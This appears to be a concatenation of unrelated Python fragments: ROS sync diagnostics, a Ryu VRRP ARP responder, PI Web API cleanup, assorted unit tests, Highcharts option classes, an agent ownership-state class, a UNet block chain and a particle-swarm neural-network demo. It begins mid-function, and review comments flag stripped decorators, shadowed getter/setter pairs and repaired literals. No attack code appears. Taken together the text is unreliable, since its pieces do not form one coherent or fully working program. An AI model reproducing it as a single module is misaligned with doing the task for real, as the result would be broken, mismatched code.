            elif (self._re_sync_hosts.match(mastername) is not None):
                result = True
        elif (self._re_ignore_hosts.match(mastername) is None):
            result = True
        elif (not is_empty_pattern(self._re_sync_hosts)):
            if (self._re_sync_hosts.match(mastername) is not None):
                result = True
        return result

    def _update_diagnostics_state(self):
        """Collect md5sum and topic-type warnings from all SyncThreads and
        publish a DiagnosticArray whenever the warning level changes."""
        md5_warnings = {}
        ttype_warnings = {}
        for (mname, mth) in self.masters.items():
            warnings = mth.get_md5warnigs()
            if warnings:
                md5_warnings[mname] = warnings
            twarnings = mth.get_topic_type_warnings()
            if twarnings:
                ttype_warnings[mname] = twarnings
        level = 0
        if (md5_warnings or ttype_warnings):
            level = 1
        if (self._current_diagnistic_level != level):
            da = DiagnosticArray()
            if (md5_warnings or ttype_warnings):
                # One DiagnosticStatus per remote master with md5 mismatches.
                for (mname, warnings) in md5_warnings.items():
                    diag_state = DiagnosticStatus()
                    diag_state.level = level
                    diag_state.name = rospy.get_name()
                    diag_state.message = ('Wrong topic md5sum %s and %s' % (mname, self._localname))
                    diag_state.hardware_id = self.hostname
                    for ((topicname, _node, _nodeuri), tmtype) in warnings.items():
                        if isinstance(tmtype, tuple):
                            (md5sum, ttype) = tmtype
                            if (md5sum is not None):
                                key = KeyValue()
                                key.key = topicname
                                key.value = str(ttype)
                                diag_state.values.append(key)
                    da.status.append(diag_state)
                # One DiagnosticStatus per remote master with type mismatches.
                for (mname, warnings) in ttype_warnings.items():
                    diag_state = DiagnosticStatus()
                    diag_state.level = level
                    diag_state.name = rospy.get_name()
                    diag_state.message = ('Wrong topics type %s and %s' % (mname, self._localname))
                    diag_state.hardware_id = self.hostname
                    for ((topicname, _node, _nodeuri), tmtype) in warnings.items():
                        ttype = tmtype
                        if isinstance(tmtype, tuple):
                            (md5sum, ttype) = tmtype
                        key = KeyValue()
                        key.key = topicname
                        key.value = str(ttype)
                        diag_state.values.append(key)
                    da.status.append(diag_state)
            else:
                # No warnings: publish an OK status to clear the latched error.
                diag_state = DiagnosticStatus()
                diag_state.level = 0
                diag_state.name = rospy.get_name()
                diag_state.message = ''
                diag_state.hardware_id = self.hostname
                da.status.append(diag_state)
            da.header.stamp = rospy.Time.now()
            self.pub_diag.publish(da)
        self._current_diagnistic_level = level
class RouterIPV4Linux(RouterIPV4):
    """VRRP IPv4 router backed by a Linux network device.

    While this instance is the VRRP master it runs an ARP responder on a raw
    AF_PACKET socket bound to the interface and announces itself with a
    gratuitous ARP; as backup the responder is stopped.
    """

    def __init__(self, *args, **kwargs):
        super(RouterIPV4Linux, self).__init__(*args, **kwargs)
        # This implementation only works with a real network device interface.
        assert isinstance(self.interface, vrrp_event.VRRPInterfaceNetworkDevice)
        # True while this router acts as the VRRP master.
        self.__is_master = False
        # Greenlet running _arp_loop(); None while the router is disabled.
        self._arp_thread = None

    def start(self):
        """Start in backup mode: routing stays disabled until elected master."""
        self._disable_router()
        super(RouterIPV4Linux, self).start()

    def _initialized_to_master(self):
        """State-machine hook: entered master state directly on init."""
        self.logger.debug('initialized to master')
        self._master()

    def _become_master(self):
        """State-machine hook: transitioned from backup to master."""
        self.logger.debug('become master')
        self._master()

    def _master(self):
        """Enable routing and announce mastership with a gratuitous ARP."""
        self.__is_master = True
        self._enable_router()
        self._send_garp()

    def _become_backup(self):
        """State-machine hook: lost mastership; stop routing."""
        self.logger.debug('become backup')
        self.__is_master = False
        self._disable_router()

    def _shutdowned(self):
        """State-machine hook: VRRP instance shut down; stop routing."""
        self._disable_router()

    def _arp_loop_socket(self, packet_socket):
        """Receive ARP frames forever and hand them to _arp_process().

        Socket timeouts are ignored so the loop keeps polling.
        """
        while True:
            try:
                buf = packet_socket.recv(1500)
            except socket.timeout:
                continue
            self._arp_process(buf)

    def _arp_loop(self):
        """Greenlet body: open a raw ARP socket on the interface and run the
        receive loop; exits cleanly when the greenlet is killed."""
        try:
            with contextlib.closing(socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ether.ETH_TYPE_ARP))) as packet_socket:
                packet_socket.bind((self.interface.device_name, socket.htons(ether.ETH_TYPE_ARP), socket.PACKET_BROADCAST, arp.ARP_HW_TYPE_ETHERNET, mac_lib.BROADCAST))
                self._arp_loop_socket(packet_socket)
        except greenlet.GreenletExit:
            pass

    def _enable_router(self):
        """Start the ARP responder greenlet (idempotent).

        NOTE(review): actual routing/table manipulation is still a TODO in
        the original code; only the ARP responder is started here.
        """
        if (self._arp_thread is None):
            self._arp_thread = hub.spawn(self._arp_loop)
        self.logger.debug('TODO:_enable_router')

    def _disable_router(self):
        """Kill and join the ARP responder greenlet (idempotent)."""
        if (self._arp_thread is not None):
            self._arp_thread.kill()
            hub.joinall([self._arp_thread])
            self._arp_thread = None
        self.logger.debug('TODO:_disable_router')
def clear_pi_system_pi_web_api(host, admin, password, pi_database, af_hierarchy_list, asset_dict):
    """Tear down the PI Web API artifacts for the given configuration:
    the element hierarchy, every asset's PI points, the element templates
    of each hierarchy level, and finally the server-side cache."""
    # 1) element hierarchy
    print('Going to delete the element hierarchy list {}.'.format(af_hierarchy_list))
    delete_element_hierarchy(host, admin, password, pi_database, af_hierarchy_list)
    print('Deleted the element hierarchy list {}.'.format(af_hierarchy_list))
    # 2) PI points, per asset and datapoint
    for asset_name, dp_names in asset_dict.items():
        for dp_name in dp_names:
            print('Going to delete the PI point. with name {}.{}'.format(asset_name, dp_name))
            delete_pi_point(host, admin, password, asset_name, dp_name)
            print('Deleted the PI point. with name {}.{}'.format(asset_name, dp_name))
    # 3) element templates of every hierarchy level
    for level_name in af_hierarchy_list:
        template_web_ids = search_for_element_template(host, admin, password, pi_database, level_name)
        print('Going to delete the element template with name {} and web ids {}'.format(level_name, template_web_ids))
        for template_web_id in template_web_ids:
            delete_element_template(host, admin, password, template_web_id)
        print('Deleted the element template with name {} and web ids {}'.format(level_name, template_web_ids))
    # 4) server cache
    clear_cache(host, admin, password, pi_database)
    print('Cleared the cache of Pi system.')
def test_no_summary_seeking(tmpdir: Path):
    """A SeekingReader must still yield all messages, attachments and
    metadata records from an MCAP file written without a summary section."""
    mcap_path = tmpdir / 'no_summary.mcap'
    write_no_summary_mcap(mcap_path)
    with open(mcap_path, 'rb') as stream:
        seeking_reader = SeekingReader(stream)
        assert sum(1 for _ in seeking_reader.iter_messages()) == 200
        assert sum(1 for _ in seeking_reader.iter_attachments()) == 1
        assert sum(1 for _ in seeking_reader.iter_metadata()) == 1
def _find_common_alerts(first_alerts: Union[(List[PendingTestAlertSchema], List[PendingModelAlertSchema], List[PendingSourceFreshnessAlertSchema])], second_alerts: Union[(List[PendingTestAlertSchema], List[PendingModelAlertSchema], List[PendingSourceFreshnessAlertSchema])]) -> Union[(List[PendingTestAlertSchema], List[PendingModelAlertSchema], List[PendingSourceFreshnessAlertSchema])]:
    """Return the alerts appearing (with identical content) in both lists.

    Alerts are compared by their canonical JSON serialization; the result
    keeps the original objects, deduplicated by id, in first-then-second
    order.
    """
    serialized_first = {alert.json(sort_keys=True) for alert in first_alerts}
    serialized_second = {alert.json(sort_keys=True) for alert in second_alerts}
    # ids of alerts whose full serialized payload occurs in both inputs
    shared_ids = {json.loads(payload)['id'] for payload in (serialized_first & serialized_second)}
    common_alerts = []
    handled_ids = []
    for candidate in [*first_alerts, *second_alerts]:
        if (candidate.id in shared_ids) and (candidate.id not in handled_ids):
            common_alerts.append(candidate)
            handled_ids.append(candidate.id)
    return common_alerts
def common_stuff(request):
    """Django template context processor: expose settings, datacenter
    settings, version info and third-party asset URLs to every template.

    NOTE(review): ``request.user.is_authenticated()`` is the pre-Django-1.10
    callable form — confirm against the project's Django version.
    """
    # Imported lazily to avoid import cycles at module load time.
    from core.version import __version__, __edition__
    from gui.node.utils import get_dc1_settings
    from api.system.update.api_views import UpdateView
    # ANALYTICS is suppressed for authenticated users.
    return {'settings': settings, 'dc_settings': request.dc.settings, 'dc1_settings': get_dc1_settings(request), 'ANALYTICS': (None if request.user.is_authenticated() else settings.ANALYTICS), 'DEBUG': _get_debug_settings(), 'SOCKETIO_URL': settings.SOCKETIO_URL, 'THIRD_PARTY_JS': get_third_party_js(), 'THIRD_PARTY_CSS': get_third_party_css(), 'SYSTEM_UPDATE_RUNNING': UpdateView.is_task_running(), 'SYSTEM_VERSION': __version__, 'SYSTEM_EDITION': __edition__}
def test_injection():
    """A Resource provider injected into several List providers must be
    initialized exactly once and yield the same underlying object."""
    resource = object()

    def _init():
        _init.counter += 1
        return resource
    _init.counter = 0

    class Container(containers.DeclarativeContainer):
        resource = providers.Resource(_init)
        dependency1 = providers.List(resource)
        dependency2 = providers.List(resource)

    container = Container()
    injected_first = container.dependency1()
    injected_second = container.dependency2()

    for injected in (injected_first, injected_second):
        assert injected == [resource]
        assert injected[0] is resource
    # the initializer ran only once despite two injection points
    assert _init.counter == 1
class BrowserPlugin(Plugin):
    """Envisage plugin that contributes the TVTK pipeline browser view to the
    workbench UI."""
    # Extension point id for workbench view contributions.
    VIEWS = 'envisage.ui.workbench.views'
    # Human-readable plugin name and unique plugin id.
    name = 'TVTK Pipeline Browser'
    id = 'tvtk.browser'
    # Views contributed to the workbench; populated by _views_default below.
    views = List(contributes_to=VIEWS)

    def _views_default(self):
        # Contribute a single view factory; the workbench invokes it per window.
        return [self._browser_view_factory]

    def _browser_view_factory(self, window, **traits):
        """Create a BrowserView bound to `window`; the import is deferred to
        keep plugin load cheap."""
        from tvtk.plugins.browser.browser_view import BrowserView
        browser_view = BrowserView(scene_manager=self._get_scene_manager(window), window=window, **traits)
        return browser_view

    def _get_scene_manager(self, window):
        # Look up the window-scoped ISceneManager service.
        from tvtk.plugins.scene.i_scene_manager import ISceneManager
        return window.get_service(ISceneManager)
# NOTE(review): the bare `.unit`, `(scope='function')` and `.usefixtures(...)` lines in
# the original were not valid Python — evidently pytest decorators whose `@pytest.mark`/
# `@pytest.fixture` prefixes were stripped. They are reconstructed below; confirm the
# marker name against the project's pytest configuration.
@pytest.mark.unit
class TestLoggerPii():
    """PII masking behavior of Pii formatting under CONFIG.logging.log_pii."""

    @pytest.fixture(scope='function')
    def log_pii_true(self) -> None:
        """Temporarily enable PII logging, restoring the prior value on teardown."""
        original_value = CONFIG.logging.log_pii
        CONFIG.logging.log_pii = True
        yield
        CONFIG.logging.log_pii = original_value

    @pytest.fixture(scope='function')
    def log_pii_false(self) -> None:
        """Temporarily disable PII logging, restoring the prior value on teardown."""
        original_value = CONFIG.logging.log_pii
        CONFIG.logging.log_pii = False
        yield
        CONFIG.logging.log_pii = original_value

    @pytest.mark.usefixtures('log_pii_false')
    def test_logger_masks_pii(self) -> None:
        # With PII logging disabled, formatting a Pii value yields the mask.
        some_data = 'some_data'
        result = '{}'.format(Pii(some_data))
        assert (result == MASKED)

    @pytest.mark.usefixtures('log_pii_true')
    def test_logger_doesnt_mask_pii(self) -> None:
        # With PII logging enabled, the raw value passes through.
        some_data = 'some_data'
        result = '{}'.format(Pii(some_data))
        assert (result == 'some_data')
class BMGNode(ABC):
    """Abstract base class for graph nodes; records incoming edges in `inputs`
    and counts outgoing edges in `outputs`."""
    inputs: InputList
    outputs: ItemCounter

    def __init__(self, inputs: List['BMGNode']):
        assert isinstance(inputs, list)
        self.inputs = InputList(self, inputs)
        self.outputs = ItemCounter()

    def is_leaf(self) -> bool:
        # A node is a leaf when nothing consumes its output.
        return not self.outputs.items
def main():
    """Train a neural network classifier on the Iris dataset using particle
    swarm optimization, report accuracy and plot the predictions in 2D."""
    # NOTE(review): the original also generated a synthetic make_classification
    # dataset here and immediately overwrote it with Iris — that dead call was removed.
    data = datasets.load_iris()
    X = normalize(data.data)
    y = to_categorical(data.target.astype('int'))

    def model_builder(n_inputs, n_outputs):
        # MLP: one 16-unit ReLU hidden layer followed by a softmax output layer.
        model = NeuralNetwork(optimizer=Adam(), loss=CrossEntropy)
        model.add(Dense(16, input_shape=(n_inputs,)))
        model.add(Activation('relu'))
        model.add(Dense(n_outputs))
        model.add(Activation('softmax'))
        return model

    print('')
    model_builder(n_inputs=X.shape[1], n_outputs=y.shape[1]).summary()
    # PSO hyperparameters.
    population_size = 100
    n_generations = 10
    (X_train, X_test, y_train, y_test) = train_test_split(X, y, test_size=0.4, seed=1)
    inertia_weight = 0.8
    cognitive_weight = 0.8
    social_weight = 0.8
    print(('Population Size: %d' % population_size))
    print(('Generations: %d' % n_generations))
    print('')
    print(('Inertia Weight: %.2f' % inertia_weight))
    print(('Cognitive Weight: %.2f' % cognitive_weight))
    print(('Social Weight: %.2f' % social_weight))
    print('')
    model = ParticleSwarmOptimizedNN(population_size=population_size, inertia_weight=inertia_weight, cognitive_weight=cognitive_weight, social_weight=social_weight, max_velocity=5, model_builder=model_builder)
    model = model.evolve(X_train, y_train, n_generations=n_generations)
    (loss, accuracy) = model.test_on_batch(X_test, y_test)
    print(('Accuracy: %.1f%%' % float((100 * accuracy))))
    # Reduce predictions to class labels for the 2D projection plot.
    y_pred = np.argmax(model.predict(X_test), axis=1)
    Plot().plot_in_2d(X_test, y_pred, title='Particle Swarm Optimized Neural Network', accuracy=accuracy, legend_labels=range(y.shape[1]))
def gen_dummy_pc_instance() -> PrivateComputationInstance:
    """Build a fully-populated dummy PrivateComputationInstance for tests."""
    infra_config: InfraConfig = InfraConfig(instance_id='pc_instance_id', role=PrivateComputationRole.PUBLISHER, status=PrivateComputationInstanceStatus.POST_PROCESSING_HANDLERS_COMPLETED, status_update_ts=int(time.time()), instances=[gen_dummy_stage_state_instance(), gen_dummy_post_processing_instance()], game_type=PrivateComputationGameType.LIFT, pce_config=PCEConfig(subnets=['subnet'], cluster='onedocker-cluster-name', region='us-west-2', onedocker_task_definition='arn:aws:ecs:us-west-2::task/cluster-name/subnet'), _stage_flow_cls_name='PrivateComputationStageFlow', retry_counter=0, num_pid_containers=1, num_mpc_containers=1, num_files_per_mpc_container=40, mpc_compute_concurrency=4, status_updates=[])
    # NOTE(review): the input_path/output_dir string literals were corrupted in the
    # original (unterminated quotes); placeholder paths restored here — confirm the
    # intended dummy values against the upstream source.
    common: CommonProductConfig = CommonProductConfig(input_path='in', output_dir='out', hmac_key='', padding_size=25)
    product_config: ProductConfig = LiftConfig(common=common, k_anonymity_threshold=100, breakdown_key=BreakdownKey.get_default_key())
    return PrivateComputationInstance(infra_config=infra_config, product_config=product_config)
class OptionSeriesWordcloudOnpoint(Options):
    """Highcharts `series.wordcloud.onPoint` configuration options.

    NOTE(review): the paired no-arg / one-arg `id` defs below look like a
    @property getter/setter pair whose decorators were stripped by the code
    generator or extraction; as written the second def shadows the first.
    Confirm against the generated original before relying on the getter.
    """

    def connectorOptions(self) -> 'OptionSeriesWordcloudOnpointConnectoroptions':
        # Sub-configuration for the connector drawn to the point.
        return self._config_sub_data('connectorOptions', OptionSeriesWordcloudOnpointConnectoroptions)

    def id(self):
        # Getter: id of the point to connect to (None when unset).
        return self._config_get(None)

    def id(self, text: str):
        # Setter: store the point id as plain (non-JS) data.
        self._config(text, js_type=False)

    def position(self) -> 'OptionSeriesWordcloudOnpointPosition':
        # Sub-configuration for the annotation position.
        return self._config_sub_data('position', OptionSeriesWordcloudOnpointPosition)
class OptionSeriesStreamgraphMarkerStatesSelect(Options):
    """Highcharts `series.streamgraph.marker.states.select` options.

    NOTE(review): each paired no-arg / one-arg def below looks like a
    @property getter/setter pair whose decorators were stripped; as written
    the setter def shadows the getter. Defaults shown in the getters are the
    Highcharts defaults.
    """

    def enabled(self):
        # Default: the select state is enabled.
        return self._config_get(True)

    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    def fillColor(self):
        # Default marker fill for selected points.
        return self._config_get('#cccccc')

    def fillColor(self, text: str):
        self._config(text, js_type=False)

    def lineColor(self):
        # Default marker border color for selected points.
        return self._config_get('#000000')

    def lineColor(self, text: str):
        self._config(text, js_type=False)

    def lineWidth(self):
        # Default marker border width (px) for selected points.
        return self._config_get(2)

    def lineWidth(self, num: float):
        self._config(num, js_type=False)

    def radius(self):
        # No explicit default radius.
        return self._config_get(None)

    def radius(self, num: float):
        self._config(num, js_type=False)
class OwnershipState(BaseOwnershipState):
    """The ownership state of an agent: currency holdings and good holdings.

    NOTE(review): `is_initialized`, `amount_by_currency_id` and
    `quantities_by_good_id` are read as attributes throughout this class
    (``self.is_initialized`` in set/is_affordable/__copy__, and
    ``self.amount_by_currency_id[...]`` in is_affordable_transaction), which
    would fail on plain bound methods — their ``@property`` decorators were
    evidently stripped and are restored here.
    """
    __slots__ = ('_amount_by_currency_id', '_quantities_by_good_id')

    def __init__(self) -> None:
        """Create an uninitialized ownership state (both holdings unset)."""
        self._amount_by_currency_id = None
        self._quantities_by_good_id = None

    def set(self, amount_by_currency_id: CurrencyHoldings=None, quantities_by_good_id: GoodHoldings=None, **kwargs: Any) -> None:
        """Initialize the state once with copies of the provided holdings.

        :raises ValueError: if either mapping is missing.
        """
        if amount_by_currency_id is None:
            raise ValueError('Must provide amount_by_currency_id.')
        if quantities_by_good_id is None:
            raise ValueError('Must provide quantities_by_good_id.')
        enforce((not self.is_initialized), 'Cannot apply state update, current state is already initialized!')
        # Copy so later caller-side mutation cannot corrupt our state.
        self._amount_by_currency_id = copy.copy(amount_by_currency_id)
        self._quantities_by_good_id = copy.copy(quantities_by_good_id)

    def apply_delta(self, delta_amount_by_currency_id: Dict[(str, int)]=None, delta_quantities_by_good_id: Dict[(str, int)]=None, **kwargs: Any) -> None:
        """Apply signed deltas to the current holdings in place.

        :raises ValueError: if a delta is missing or the state is uninitialized.
        """
        if delta_amount_by_currency_id is None:
            raise ValueError('Must provide delta_amount_by_currency_id.')
        if delta_quantities_by_good_id is None:
            raise ValueError('Must provide delta_quantities_by_good_id.')
        if (self._amount_by_currency_id is None) or (self._quantities_by_good_id is None):
            raise ValueError('Cannot apply state update, current state is not initialized!')
        # Deltas may only touch currencies/goods already tracked.
        enforce(all(((key in self._amount_by_currency_id) for key in delta_amount_by_currency_id.keys())), 'Invalid keys present in delta_amount_by_currency_id.')
        enforce(all(((key in self._quantities_by_good_id) for key in delta_quantities_by_good_id.keys())), 'Invalid keys present in delta_quantities_by_good_id.')
        for (currency_id, amount_delta) in delta_amount_by_currency_id.items():
            self._amount_by_currency_id[currency_id] += amount_delta
        for (good_id, quantity_delta) in delta_quantities_by_good_id.items():
            self._quantities_by_good_id[good_id] += quantity_delta

    @property
    def is_initialized(self) -> bool:
        """True once both holdings have been set."""
        return ((self._amount_by_currency_id is not None) and (self._quantities_by_good_id is not None))

    @property
    def amount_by_currency_id(self) -> CurrencyHoldings:
        """A defensive copy of the currency holdings.

        :raises ValueError: if the state is uninitialized.
        """
        if self._amount_by_currency_id is None:
            raise ValueError('amount_by_currency_id is not set!')
        return copy.copy(self._amount_by_currency_id)

    @property
    def quantities_by_good_id(self) -> GoodHoldings:
        """A defensive copy of the good holdings.

        :raises ValueError: if the state is uninitialized.
        """
        if self._quantities_by_good_id is None:
            raise ValueError('quantities_by_good_id is not set!')
        return copy.copy(self._quantities_by_good_id)

    def is_affordable_transaction(self, terms: Terms) -> bool:
        """Check whether the transaction in `terms` is affordable.

        A transaction is affordable when the agent pays goods with currency it
        holds, or pays currency for goods it holds; zero-for-zero and mixed-sign
        terms are not affordable.
        """
        if (all(((amount == 0) for amount in terms.amount_by_currency_id.values())) and all(((quantity == 0) for quantity in terms.quantities_by_good_id.values()))):
            # Empty transaction: nothing changes hands.
            result = False
        elif (all(((amount <= 0) for amount in terms.amount_by_currency_id.values())) and all(((quantity >= 0) for quantity in terms.quantities_by_good_id.values()))):
            # Paying currency to receive goods: need enough of each currency.
            result = all(((self.amount_by_currency_id[currency_id] >= (- amount)) for (currency_id, amount) in terms.amount_by_currency_id.items()))
        elif (all(((amount >= 0) for amount in terms.amount_by_currency_id.values())) and all(((quantity <= 0) for quantity in terms.quantities_by_good_id.values()))):
            # Selling goods for currency: need enough of each good.
            result = all(((self.quantities_by_good_id[good_id] >= (- quantity)) for (good_id, quantity) in terms.quantities_by_good_id.items()))
        else:
            result = False
        return result

    def is_affordable(self, terms: Terms) -> bool:
        """Like is_affordable_transaction, but optimistically True when the
        state has not been initialized yet."""
        if self.is_initialized:
            is_affordable = self.is_affordable_transaction(terms)
        else:
            _default_logger.debug('Cannot verify whether transaction is affordable as ownership state is not initialized. Assuming it is!')
            is_affordable = True
        return is_affordable

    def update(self, terms: Terms) -> None:
        """Apply the deltas in `terms` directly to the holdings.

        Unlike apply_delta, no key validation is performed here.

        :raises ValueError: if the state is uninitialized.
        """
        if (self._amount_by_currency_id is None) or (self._quantities_by_good_id is None):
            raise ValueError('Cannot apply state update, current state is not initialized!')
        for (currency_id, amount_delta) in terms.amount_by_currency_id.items():
            self._amount_by_currency_id[currency_id] += amount_delta
        for (good_id, quantity_delta) in terms.quantities_by_good_id.items():
            self._quantities_by_good_id[good_id] += quantity_delta

    def apply_transactions(self, list_of_terms: List[Terms]) -> 'OwnershipState':
        """Return a copy of this state with every transaction applied in order;
        self is left untouched."""
        new_state = copy.copy(self)
        for terms in list_of_terms:
            new_state.update(terms)
        return new_state

    def __copy__(self) -> 'OwnershipState':
        """Copy the state; holdings are copied only when initialized."""
        state = OwnershipState()
        if self.is_initialized:
            state._amount_by_currency_id = self.amount_by_currency_id
            state._quantities_by_good_id = self.quantities_by_good_id
        return state
class DownBlocks(fl.Chain):
    """Down-sampling half of an SD-style UNet: channel widths 320 → 640 → 1280
    with residual blocks, CLIP-L cross-attention, and three stride-2 downsamples.

    NOTE(review): self.in_channels is assigned *before* super().__init__ runs —
    presumably because fl.Chain's constructor consumes the child modules; confirm
    the ordering is intentional before reordering.
    """

    def __init__(self, in_channels: int, device: ((Device | str) | None)=None, dtype: (DType | None)=None):
        # Number of channels of the input feature map fed to the first conv.
        self.in_channels = in_channels
        super().__init__(fl.Chain(fl.Conv2d(in_channels=in_channels, out_channels=320, kernel_size=3, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype), CLIPLCrossAttention(channels=320, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=320, device=device, dtype=dtype), CLIPLCrossAttention(channels=320, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=320, scale_factor=2, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=320, out_channels=640, device=device, dtype=dtype), CLIPLCrossAttention(channels=640, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=640, out_channels=640, device=device, dtype=dtype), CLIPLCrossAttention(channels=640, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=640, scale_factor=2, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=640, out_channels=1280, device=device, dtype=dtype), CLIPLCrossAttention(channels=1280, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype), CLIPLCrossAttention(channels=1280, device=device, dtype=dtype)), fl.Chain(fl.Downsample(channels=1280, scale_factor=2, padding=1, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype)), fl.Chain(ResidualBlock(in_channels=1280, out_channels=1280, device=device, dtype=dtype)))
def _shape_to_str(shapes: List[Union[(IntVar, Tensor)]], intimm_to_int=False):
    """Render a list of shape dimensions as a bracketed, comma-separated string.

    Static IntImm dims become either the raw integer (intimm_to_int=True) or an
    `IntImm(v)` wrapper; dynamic IntVar dims render their values and name.
    """
    rendered = []
    for dim in shapes:
        if isinstance(dim, IntImm):
            rendered.append(f'{dim.value()}' if intimm_to_int else f'IntImm({dim.value()})')
        elif isinstance(dim, IntVar):
            rendered.append(f"IntVar({dim._attrs['values']}, name='{dim._attrs['name']}')")
        elif isinstance(dim, Tensor):
            raise RuntimeError('IntVarTensor not supported yet')
        else:
            # Unrecognized entries contribute nothing between separators,
            # matching the original separator-only output.
            rendered.append('')
    return '[' + ', '.join(rendered) + ']'
def dfs(root_path: str, header_lines=None) -> List[str]:
    """Walk `root_path` and return every .py file missing a required header line.

    Args:
        root_path: root of the directory tree to scan.
        header_lines: the lines that must all appear in each file; defaults to
            the module-level HEADER_lines for backward compatibility.

    Returns:
        Paths of .py files where at least one required line is absent.
    """
    required = HEADER_lines if header_lines is None else header_lines
    missing = []
    for (root, _, files) in os.walk(root_path, topdown=False):
        for name in files:
            path = os.path.join(root, name)
            if not path.endswith('.py'):
                continue
            with open(path) as fi:
                src = fi.read()
            # Flag the file unless every required header line is present.
            if not all((line in src) for line in required):
                missing.append(path)
    return missing
def sync_tree(root, dest, concurrency=1, disable_progress=False, recursive=False, dont_checkout=False, dont_store_token=False):
    """Clone or pull every project under `root` into `dest` concurrently,
    reporting progress unless disabled, and log the elapsed time."""
    if not disable_progress:
        progress.init_progress(len(root.leaves))
    git_actions = get_git_actions(root, dest, recursive, dont_checkout, dont_store_token)
    # Fan the per-project git work out over a thread pool.
    with concurrent.futures.ThreadPoolExecutor(max_workers=concurrency) as pool:
        pool.map(clone_or_pull_project, git_actions)
    elapsed = progress.finish_progress()
    log.debug('Syncing projects took [%s]', elapsed)
class TestPIDRunProtocolStageService(IsolatedAsyncioTestCase):
    """Tests for PIDRunProtocolStageService.run_async across roles, PID
    protocols, run ids and TLS settings."""

    # NOTE(review): these two decorators were bare strings in the original —
    # evidently @patch decorators whose prefix was stripped; restored here.
    # Order matches the mock arguments (unittest.mock injects bottom-up).
    @patch('fbpcp.service.storage.StorageService')
    @patch('fbpcp.service.onedocker.OneDockerService')
    def setUp(self, mock_onedocker_service, mock_storage_service) -> None:
        self.mock_onedocker_svc = mock_onedocker_service
        self.mock_storage_svc = mock_storage_service
        self.test_num_containers = 1
        self.onedocker_binary_config_map = defaultdict(lambda: OneDockerBinaryConfig(tmp_directory='/test_tmp_directory/', binary_version='latest', repository_path='test_path/'))
        self.server_ips = [f'192.0.2.{i}' for i in range(self.test_num_containers)]
        self.input_path = 'in'
        self.output_path = 'out'
        self.pc_instance_id = 'test_instance_123'
        self.port = 15200
        self.use_row_numbers = True
        self.container_permission_id = 'test-container-permission'

    async def test_pid_run_protocol_stage(self) -> None:
        """run_async starts the right binary with the right args and appends a
        StageStateInstance, for every role/protocol/run-id combination."""
        async def _run_sub_test(pc_role: PrivateComputationRole, multikey_enabled: bool, run_id: Optional[str]=None) -> None:
            # Multikey protocol only applies with a single container.
            pid_protocol = (PIDProtocol.UNION_PID_MULTIKEY if ((self.test_num_containers == 1) and multikey_enabled) else PIDProtocol.UNION_PID)
            use_row_number = pid_should_use_row_numbers(self.use_row_numbers, pid_protocol)
            pc_instance = self.create_sample_pc_instance(pc_role, pid_use_row_numbers=use_row_number, pid_protocol=pid_protocol, multikey_enabled=multikey_enabled, run_id=run_id)
            stage_svc = PIDRunProtocolStageService(storage_svc=self.mock_storage_svc, onedocker_svc=self.mock_onedocker_svc, onedocker_binary_config_map=self.onedocker_binary_config_map)
            containers = [self.create_container_instance(i) for i in range(self.test_num_containers)]
            self.mock_onedocker_svc.start_containers = MagicMock(return_value=containers)
            self.mock_onedocker_svc.wait_for_pending_containers = AsyncMock(return_value=containers)
            updated_pc_instance = await stage_svc.run_async(pc_instance=pc_instance, server_certificate_provider=NullCertificateProvider(), ca_certificate_provider=NullCertificateProvider(), server_certificate_path='', ca_certificate_path='', server_ips=self.server_ips)
            binary_name = PIDRunProtocolBinaryService.get_binary_name(pid_protocol, pc_role)
            binary_config = self.onedocker_binary_config_map[binary_name]
            env_vars = generate_env_vars_dict(repository_path=binary_config.repository_path, RUST_LOG='info')
            args_str_expect = self.get_args_expect(pc_role, pid_protocol, self.use_row_numbers, run_id)
            self.mock_onedocker_svc.start_containers.assert_called_with(package_name=binary_name, version=binary_config.binary_version, cmd_args_list=args_str_expect, timeout=DEFAULT_CONTAINER_TIMEOUT_IN_SEC, env_vars=env_vars, container_type=None, certificate_request=None, opa_workflow_path=None, permission=ContainerPermissionConfig(self.container_permission_id))
            self.assertEqual(len(updated_pc_instance.infra_config.instances), self.test_num_containers, 'Failed to add the StageStageInstance into pc_instance')
            stage_state_expect = StageStateInstance(pc_instance.infra_config.instance_id, pc_instance.current_stage.name, containers=containers)
            stage_state_actual = updated_pc_instance.infra_config.instances[0]
            self.assertEqual(stage_state_actual, stage_state_expect, 'Appended StageStageInstance is not as expected')
        data_tests = itertools.product([PrivateComputationRole.PUBLISHER, PrivateComputationRole.PARTNER], [True, False], [None, '2621fda2-0eca-11ed-861d-0242ac120002'])
        for (pc_role, multikey_enabled, test_run_id) in data_tests:
            with self.subTest(pc_role=pc_role, multikey_enabled=multikey_enabled, test_run_id=test_run_id):
                await _run_sub_test(pc_role=pc_role, multikey_enabled=multikey_enabled, run_id=test_run_id)

    async def test_pid_run_protocol_stage_tls_enabled_publisher(self) -> None:
        """With a server domain configured, the publisher's StageStateInstance
        carries the generated TLS server hostnames."""
        pc_role = PrivateComputationRole.PUBLISHER
        pc_instance = self.create_sample_pc_instance(pc_role, server_domain='test_domain')
        stage_svc = PIDRunProtocolStageService(storage_svc=self.mock_storage_svc, onedocker_svc=self.mock_onedocker_svc, onedocker_binary_config_map=self.onedocker_binary_config_map)
        containers = [self.create_container_instance(i) for i in range(self.test_num_containers)]
        self.mock_onedocker_svc.start_containers = MagicMock(return_value=containers)
        self.mock_onedocker_svc.wait_for_pending_containers = AsyncMock(return_value=containers)
        server_hostnames = gen_tls_server_hostnames_for_publisher(pc_instance.infra_config.server_domain, pc_role, self.test_num_containers)
        stage_state_expect = StageStateInstance(pc_instance.infra_config.instance_id, pc_instance.current_stage.name, containers=containers, server_uris=server_hostnames)
